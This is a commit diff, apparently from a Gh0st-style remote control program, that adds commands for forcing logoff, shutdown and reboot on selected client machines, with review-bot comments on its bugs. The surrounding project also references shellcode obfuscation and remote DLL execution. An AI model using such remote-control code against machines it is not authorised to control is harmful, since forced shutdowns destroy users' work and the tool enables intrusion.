Feature: Add machine logout, shutdown and reboot cmd

yuanyuanxiang
2025-10-19 19:52:12 +08:00
parent d193e2cfe5
commit 25cf3ea990
9 changed files with 127 additions and 1 deletions


@@ -365,6 +365,34 @@ BOOL IsRunningAsAdmin()
return isAdmin; return isAdmin;
} }
bool EnableShutdownPrivilege() {
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
// 打开当前进程的令牌
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
return false;
}
// 获取关机权限的 LUID
if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid)) {
CloseHandle(hToken);
return false;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// 启用关机权限
if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0)) {
CloseHandle(hToken);
return false;
}
CloseHandle(hToken);
return true;
}
VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength) VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
{ {
bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT; bool isExit = szBuffer[0] == COMMAND_BYE || szBuffer[0] == SERVER_EXIT;
@@ -377,6 +405,29 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
std::string publicIP = m_ClientObject->GetClientIP(); std::string publicIP = m_ClientObject->GetClientIP();
switch (szBuffer[0]) { switch (szBuffer[0]) {
case TOKEN_MACHINE_MANAGE:
if (ulLength <= 1 || !EnableShutdownPrivilege()) break;
#ifdef _DEBUG
Mprintf("收到机器管理命令: %d, %d\n", szBuffer[0], szBuffer[1]);
break;
#endif
switch (szBuffer[1])
{
case MACHINE_LOGOUT: {
ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
break;
}
case MACHINE_SHUTDOWN: {
ExitWindowsEx(EWX_POWEROFF | EWX_FORCE, 0);
break;
}
case MACHINE_REBOOT: {
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
break;
}
default:
break;
}
case CMD_RUNASADMIN: { case CMD_RUNASADMIN: {
char curFile[_MAX_PATH] = {}; char curFile[_MAX_PATH] = {};
GetModuleFileName(NULL, curFile, MAX_PATH); GetModuleFileName(NULL, curFile, MAX_PATH);
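Review bot: `case TOKEN_MACHINE_MANAGE:` never breaks after its inner `switch (szBuffer[1])` closes, so in non-debug builds every machine command, including an unknown sub-command that reaches `default:`, falls through into `case CMD_RUNASADMIN:` and runs that handler too; add `break;` after the inner switch's closing brace. The only `break;` for this case sits inside `#ifdef _DEBUG`, which makes the logoff/shutdown/reboot code unreachable in debug builds; if that is intended, a comment such as `// debug builds only log the request and never act on it` would make it clear. In `EnableShutdownPrivilege()`, `AdjustTokenPrivileges` returns nonzero even when the privilege was not granted, so the function should also require `GetLastError() == ERROR_SUCCESS` (that is, not `ERROR_NOT_ALL_ASSIGNED`) before returning true. The return value of `ExitWindowsEx` is ignored and `EWX_FORCE` discards the logged-on user's unsaved work, so a failed call should at least be logged. `OnReceive` starts and continues outside the shown hunks.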


@@ -191,6 +191,7 @@ enum {
TOKEN_CHAT_START = 62, // Զ<>̽<EFBFBD≯ TOKEN_CHAT_START = 62, // Զ<>̽<EFBFBD≯
TOKEN_UNINSTALL = 63, // ж<><D0B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD> TOKEN_UNINSTALL = 63, // ж<><D0B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
TOKEN_PRIVATESCREEN = 64, // <20><>˽<EFBFBD><CBBD>Ļ TOKEN_PRIVATESCREEN = 64, // <20><>˽<EFBFBD><CBBD>Ļ
TOKEN_MACHINE_MANAGE = 65, // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
// <20><><EFBFBD><EFBFBD><EFBFBD>˷<EFBFBD><CBB7><EFBFBD><EFBFBD>ı<EFBFBD>ʶ // <20><><EFBFBD><EFBFBD><EFBFBD>˷<EFBFBD><CBB7><EFBFBD><EFBFBD>ı<EFBFBD>ʶ
TOKEN_AUTH = 100, // Ҫ<><D2AA><EFBFBD><EFBFBD>֤ TOKEN_AUTH = 100, // Ҫ<><D2AA><EFBFBD><EFBFBD>֤
@@ -264,6 +265,12 @@ enum {
CMD_EXECUTE_DLL = 240, // ִ<>д<EFBFBD><D0B4><EFBFBD> CMD_EXECUTE_DLL = 240, // ִ<>д<EFBFBD><D0B4><EFBFBD>
}; };
enum MachineCommand {
MACHINE_LOGOUT,
MACHINE_SHUTDOWN,
MACHINE_REBOOT,
};
enum ProxyManager { enum ProxyManager {
TOKEN_PROXY_CONNECT_RESULT, TOKEN_PROXY_CONNECT_RESULT,
TOKEN_PROXY_BIND_RESULT, TOKEN_PROXY_BIND_RESULT,
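Review bot: `enum MachineCommand` relies on implicit enumerator values even though they travel on the wire as the second byte of a `TOKEN_MACHINE_MANAGE` packet, so inserting or reordering an entry later would silently change what an older client does with the same byte. Pin the values the way the neighbouring token enum does, e.g. `MACHINE_LOGOUT = 0,`, `MACHINE_SHUTDOWN = 1,`, `MACHINE_REBOOT = 2,`, and add a comment that they are part of the protocol. The comment on the new `TOKEN_MACHINE_MANAGE = 65` line renders as replacement characters on this page, which suggests the header is not stored as UTF-8; that is worth confirming against the file itself.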

Binary file not shown.


@@ -50,6 +50,7 @@
#define UM_ICONNOTIFY WM_USER+100 #define UM_ICONNOTIFY WM_USER+100
#define TIMER_CHECK 1 #define TIMER_CHECK 1
#define TIMER_CLOSEWND 2 #define TIMER_CLOSEWND 2
#define TODO_NOTICE MessageBoxA("This feature has not been implemented!\nPlease contact: 962914132@qq.com", "提示", MB_ICONINFORMATION);
typedef struct { typedef struct {
const char* szTitle; //列表的名称 const char* szTitle; //列表的名称
@@ -356,6 +357,7 @@ CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::I
m_bmOnline[14].LoadBitmap(IDB_BITMAP_ADMINRUN); m_bmOnline[14].LoadBitmap(IDB_BITMAP_ADMINRUN);
m_bmOnline[15].LoadBitmap(IDB_BITMAP_UNINSTALL); m_bmOnline[15].LoadBitmap(IDB_BITMAP_UNINSTALL);
m_bmOnline[16].LoadBitmap(IDB_BITMAP_PDESKTOP); m_bmOnline[16].LoadBitmap(IDB_BITMAP_PDESKTOP);
m_bmOnline[17].LoadBitmap(IDB_BITMAP_REGROUP);
for (int i = 0; i < PAYLOAD_MAXTYPE; i++) { for (int i = 0; i < PAYLOAD_MAXTYPE; i++) {
m_ServerDLL[i] = nullptr; m_ServerDLL[i] = nullptr;
@@ -486,6 +488,12 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx)
ON_COMMAND(ID_ONLINE_PRIVATE_SCREEN, &CMy2015RemoteDlg::OnOnlinePrivateScreen) ON_COMMAND(ID_ONLINE_PRIVATE_SCREEN, &CMy2015RemoteDlg::OnOnlinePrivateScreen)
ON_NOTIFY(TCN_SELCHANGE, IDC_GROUP_TAB, &CMy2015RemoteDlg::OnSelchangeGroupTab) ON_NOTIFY(TCN_SELCHANGE, IDC_GROUP_TAB, &CMy2015RemoteDlg::OnSelchangeGroupTab)
ON_COMMAND(ID_OBFS_SHELLCODE, &CMy2015RemoteDlg::OnObfsShellcode) ON_COMMAND(ID_OBFS_SHELLCODE, &CMy2015RemoteDlg::OnObfsShellcode)
ON_COMMAND(ID_ONLINE_REGROUP, &CMy2015RemoteDlg::OnOnlineRegroup)
ON_COMMAND(ID_MACHINE_SHUTDOWN, &CMy2015RemoteDlg::OnMachineShutdown)
ON_COMMAND(ID_MACHINE_REBOOT, &CMy2015RemoteDlg::OnMachineReboot)
ON_COMMAND(ID_EXECUTE_DOWNLOAD, &CMy2015RemoteDlg::OnExecuteDownload)
ON_COMMAND(ID_EXECUTE_UPLOAD, &CMy2015RemoteDlg::OnExecuteUpload)
ON_COMMAND(ID_MACHINE_LOGOUT, &CMy2015RemoteDlg::OnMachineLogout)
END_MESSAGE_MAP() END_MESSAGE_MAP()
@@ -1477,6 +1485,7 @@ void CMy2015RemoteDlg::OnNMRClickOnline(NMHDR *pNMHDR, LRESULT *pResult)
Menu.SetMenuItemBitmaps(ID_ONLINE_RUN_AS_ADMIN, MF_BYCOMMAND, &m_bmOnline[14], &m_bmOnline[14]); Menu.SetMenuItemBitmaps(ID_ONLINE_RUN_AS_ADMIN, MF_BYCOMMAND, &m_bmOnline[14], &m_bmOnline[14]);
Menu.SetMenuItemBitmaps(ID_ONLINE_UNINSTALL, MF_BYCOMMAND, &m_bmOnline[15], &m_bmOnline[15]); Menu.SetMenuItemBitmaps(ID_ONLINE_UNINSTALL, MF_BYCOMMAND, &m_bmOnline[15], &m_bmOnline[15]);
Menu.SetMenuItemBitmaps(ID_ONLINE_PRIVATE_SCREEN, MF_BYCOMMAND, &m_bmOnline[16], &m_bmOnline[16]); Menu.SetMenuItemBitmaps(ID_ONLINE_PRIVATE_SCREEN, MF_BYCOMMAND, &m_bmOnline[16], &m_bmOnline[16]);
Menu.SetMenuItemBitmaps(ID_ONLINE_REGROUP, MF_BYCOMMAND, &m_bmOnline[17], &m_bmOnline[17]);
std::string masterHash(GetMasterHash()); std::string masterHash(GetMasterHash());
if (GetPwdHash() != masterHash || m_superPass.empty()) { if (GetPwdHash() != masterHash || m_superPass.empty()) {
@@ -3369,3 +3378,53 @@ void CMy2015RemoteDlg::OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult)
*pResult = 0; *pResult = 0;
} }
void CMy2015RemoteDlg::OnOnlineRegroup()
{
TODO_NOTICE;
}
void CMy2015RemoteDlg::MachineManage(MachineCommand type) {
if (MessageBoxA("此操作需客户端具有管理员权限,确定继续吗? ", "提示", MB_ICONQUESTION | MB_YESNO) == IDYES) {
EnterCriticalSection(&m_cs);
POSITION Pos = m_CList_Online.GetFirstSelectedItemPosition();
while (Pos) {
int iItem = m_CList_Online.GetNextSelectedItem(Pos);
context* ContextObject = (context*)m_CList_Online.GetItemData(iItem);
BYTE token[32] = { TOKEN_MACHINE_MANAGE, type };
ContextObject->Send2Client(token, sizeof(token));
}
LeaveCriticalSection(&m_cs);
}
}
void CMy2015RemoteDlg::OnMachineLogout()
{
MachineManage(MACHINE_LOGOUT);
}
void CMy2015RemoteDlg::OnMachineShutdown()
{
MachineManage(MACHINE_SHUTDOWN);
}
void CMy2015RemoteDlg::OnMachineReboot()
{
MachineManage(MACHINE_REBOOT);
}
void CMy2015RemoteDlg::OnExecuteDownload()
{
TODO_NOTICE;
}
void CMy2015RemoteDlg::OnExecuteUpload()
{
TODO_NOTICE;
}
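Review bot: `MachineManage()` shows the same confirmation text for logout, shutdown and reboot and does not say how many clients are selected, although the command then goes to every selected row and the client side acts with `EWX_FORCE`. The prompt should name the action and the number of targets so an operator cannot confirm the wrong destructive action by accident. Inside the loop the pointer returned by `GetItemData` is dereferenced unchecked; `if (!ContextObject) continue;` before `Send2Client` avoids a crash on a row without item data. `BYTE token[32] = { TOKEN_MACHINE_MANAGE, type };` narrows an enum to `BYTE` inside braces, so `static_cast<BYTE>(type)` is the safer spelling.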


@@ -228,7 +228,7 @@ public:
CRITICAL_SECTION m_cs; CRITICAL_SECTION m_cs;
BOOL isClosed; BOOL isClosed;
CMenu m_MainMenu; CMenu m_MainMenu;
CBitmap m_bmOnline[17]; CBitmap m_bmOnline[18];
uint64_t m_superID; uint64_t m_superID;
enum { enum {
STATUS_UNKNOWN = -1, STATUS_UNKNOWN = -1,
@@ -323,4 +323,11 @@ public:
CTabCtrl m_GroupTab; CTabCtrl m_GroupTab;
afx_msg void OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult); afx_msg void OnSelchangeGroupTab(NMHDR* pNMHDR, LRESULT* pResult);
afx_msg void OnObfsShellcode(); afx_msg void OnObfsShellcode();
afx_msg void OnOnlineRegroup();
afx_msg void OnMachineShutdown();
afx_msg void OnMachineReboot();
afx_msg void OnExecuteDownload();
afx_msg void OnExecuteUpload();
afx_msg void OnMachineLogout();
void MachineManage(MachineCommand type);
}; };
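Review bot: `MachineManage(MachineCommand type)` is declared without a comment at the end of the `afx_msg` handler list, where it reads like another message handler. A one-line comment such as `// Sends TOKEN_MACHINE_MANAGE with the given sub-command to every selected client after the user confirms.` would set it apart from the handlers. The bare `18` in `m_bmOnline[18]` has to be kept in step by hand with the highest index used in the constructor and in `OnNMRClickOnline`; a named constant would make that coupling visible.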


@@ -405,6 +405,7 @@
<Image Include="res\Bitmap\AssignTo.bmp" /> <Image Include="res\Bitmap\AssignTo.bmp" />
<Image Include="res\Bitmap\authorize.bmp" /> <Image Include="res\Bitmap\authorize.bmp" />
<Image Include="res\Bitmap\DxgiDesktop.bmp" /> <Image Include="res\Bitmap\DxgiDesktop.bmp" />
<Image Include="res\Bitmap\EditGroup.bmp" />
<Image Include="res\Bitmap\GrayDesktop.bmp" /> <Image Include="res\Bitmap\GrayDesktop.bmp" />
<Image Include="res\Bitmap\note.bmp" /> <Image Include="res\Bitmap\note.bmp" />
<Image Include="res\Bitmap\PrivateScreen.bmp" /> <Image Include="res\Bitmap\PrivateScreen.bmp" />


@@ -165,6 +165,7 @@
<Image Include="res\Bitmap\AdminRun.bmp" /> <Image Include="res\Bitmap\AdminRun.bmp" />
<Image Include="res\Bitmap\remove.bmp" /> <Image Include="res\Bitmap\remove.bmp" />
<Image Include="res\Bitmap\PrivateScreen.bmp" /> <Image Include="res\Bitmap\PrivateScreen.bmp" />
<Image Include="res\Bitmap\EditGroup.bmp" />
</ItemGroup> </ItemGroup>
<ItemGroup> <ItemGroup>
<None Include="..\..\Release\ghost.exe" /> <None Include="..\..\Release\ghost.exe" />

Binary file not shown.


Binary file not shown.